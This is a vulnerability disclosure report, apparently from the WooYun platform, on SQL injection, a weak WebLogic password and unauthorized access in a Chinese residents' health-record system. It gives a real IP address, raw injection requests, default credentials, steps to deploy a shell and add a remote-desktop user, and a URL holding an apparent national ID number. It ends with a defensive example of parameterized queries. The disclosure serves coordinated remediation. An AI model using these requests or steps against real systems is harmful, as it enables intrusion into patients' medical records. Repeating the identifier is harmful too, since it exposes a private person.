
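Vulnerability summary

Bug ID: wooyun-2015-0117247

Title: SQL injection in an urban and rural residents' health record management system (35 databases, DBA privileges) + WebLogic weak password + unauthorized access to user information (affecting several million users' records)

Affected vendor: Urban and Rural Residents' Health Record Management System

Author: 几何黑店

Submitted: 2015-05-31 12:41

Fixed: 2015-07-19 15:20

Disclosed: 2015-07-19 15:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org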


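Vulnerability details

Disclosure status:

2015-05-31: Details reported to the vendor; awaiting vendor handling
2015-06-04: Vendor confirmed; details disclosed to the vendor only
2015-06-14: Details disclosed to core white hats and experts in related fields
2015-06-24: Details disclosed to regular white hats
2015-07-04: Details disclosed to intern white hats
2015-07-19: Details disclosed to the public

Brief description:

SQL injection in an urban and rural residents' health record management system (35 databases) + WebLogic weak password + unauthorized access to user information (affecting several million users' records)

Detailed description:

http://202.100.78.91:7001/jkda
Injection in the login form: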

POST /jkda/LoginAction.do HTTP/1.1
Host: 202.100.78.91:7001
Content-Length: 29
Accept: */*
Origin: http://202.100.78.91:7001
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://202.100.78.91:7001/jkda/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=B549DCD7A115943BD28824A24963658C
X-dotNet-Beautifier: 1; DO-NOT-REMOVE

userCode=admin&userPass=admin


Parameters: userCode and userPass


Database: JINCHANG_TEST1
[467 tables]


Database: MZJZ
[194 tables]


Unauthorized access

http://202.100.78.91:7001/jkda/daxx/person.jsp?area_code=620621&ylzh=&grbh=&sfzh=622322196212122632



Proof of vulnerability:

With the WebLogic weak password, a WAR package can be deployed to get a shell
http://202.100.78.91:7003/console/



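The server also has port 3389 open; after uploading a shell, a user can be added directly and used to log in over 3389.
After browsing the file directory, I found that the login forms of other copies of the same program are all vulnerable to SQL injection as well (including but not limited to):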
http://202.100.78.91:7001/renewal/
http://202.100.78.91:7001/mzjzml/
http://202.100.78.91:7001/sjpt/
http://202.100.78.91:7001/mzjzan/
http://202.100.78.91:7001/mzjz/
http://202.100.78.91:7001/gsdb/
Searching Baidu for the IP:



A WSDL was also found, likewise with 4 injection points:
http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 581
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Get_Is_Sk>
<urn:in0>1&apos;&quot;</urn:in0>
<urn:in1>1</urn:in1>
</urn:Get_Is_Sk>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


Parameter: <urn:in0>1&apos;&quot;</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 591
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Get_Is_Hops_Sk>
<urn:in0>1&apos;&quot;</urn:in0>
<urn:in1>1</urn:in1>
</urn:Get_Is_Hops_Sk>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


Parameter: <urn:in0>1&apos;&quot;</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 581
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:GetYljgjb>
<urn:in0>1&apos;&quot;</urn:in0>
<urn:in1>1</urn:in1>
</urn:GetYljgjb>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


Parameter: <urn:in0>1&apos;&quot;</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 640
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Find_Member1>
<urn:in0>
<urn:string>1&apos;&quot;</urn:string>
</urn:in0>
<urn:in1>1</urn:in1>
</urn:Find_Member1>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


Parameter: <urn:string>1&apos;&quot;</urn:string>

Remediation:

You know what to do
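
The login form parameters (userCode, userPass) and the SOAP in0 parameter reported above share one root cause: request values concatenated into SQL text. The following is an added example, not code from the affected system or from the original report; it uses Python's sqlite3 as a stand-in database, and the table demo_user, its columns and the account row are constructed assumptions.

```python
import sqlite3

# The quote probe shown in the report's SOAP requests (1&apos;&quot; once XML-unescaped).
PROBE = "1'\""

def make_db():
    """Constructed stand-in database; the real schema is not shown in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE demo_user (user_code TEXT PRIMARY KEY, user_pass TEXT)")
    # Constructed account. Password hashing is left out to keep the focus on
    # how the query is built; a real system stores a salted hash.
    db.execute("INSERT INTO demo_user VALUES (?, ?)", ("doctor01", "S3cure-example"))
    return db

def login_concatenated(db, user_code, user_pass):
    """Vulnerable pattern: request values become part of the SQL text."""
    sql = ("SELECT COUNT(*) FROM demo_user WHERE user_code = '" + user_code
           + "' AND user_pass = '" + user_pass + "'")
    try:
        return "ok" if db.execute(sql).fetchone()[0] else "denied"
    except sqlite3.Error:
        # The quotes closed the string literal early, so the rest of the input
        # reached the SQL parser. A database error on a quote probe is the
        # signal that the parameter is injectable.
        return "sql-error"

def login_parameterized(db, user_code, user_pass):
    """Hardened pattern: the SQL text is constant and the values are bound."""
    sql = "SELECT COUNT(*) FROM demo_user WHERE user_code = ? AND user_pass = ?"
    return "ok" if db.execute(sql, (user_code, user_pass)).fetchone()[0] else "denied"

if __name__ == "__main__":
    db = make_db()
    for fn in (login_concatenated, login_parameterized):
        # Each line: function name, result for the valid login, result for the probe.
        print(fn.__name__, fn(db, "doctor01", "S3cure-example"), fn(db, PROBE, "x"))
```

Bound parameters remove the injection itself; because the report notes DBA privileges, running the application under a non-DBA database account also limits what any remaining flaw can reach.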

Copyright notice: when reposting, please credit the source: 几何黑店@乌云


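Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-06-04 15:18

Vendor reply:

CNVD confirmed and reproduced the vulnerability as described, and has passed it via CNCERT to the Gansu sub-center, which will coordinate follow-up handling with the organization that operates the site.

Latest status:

None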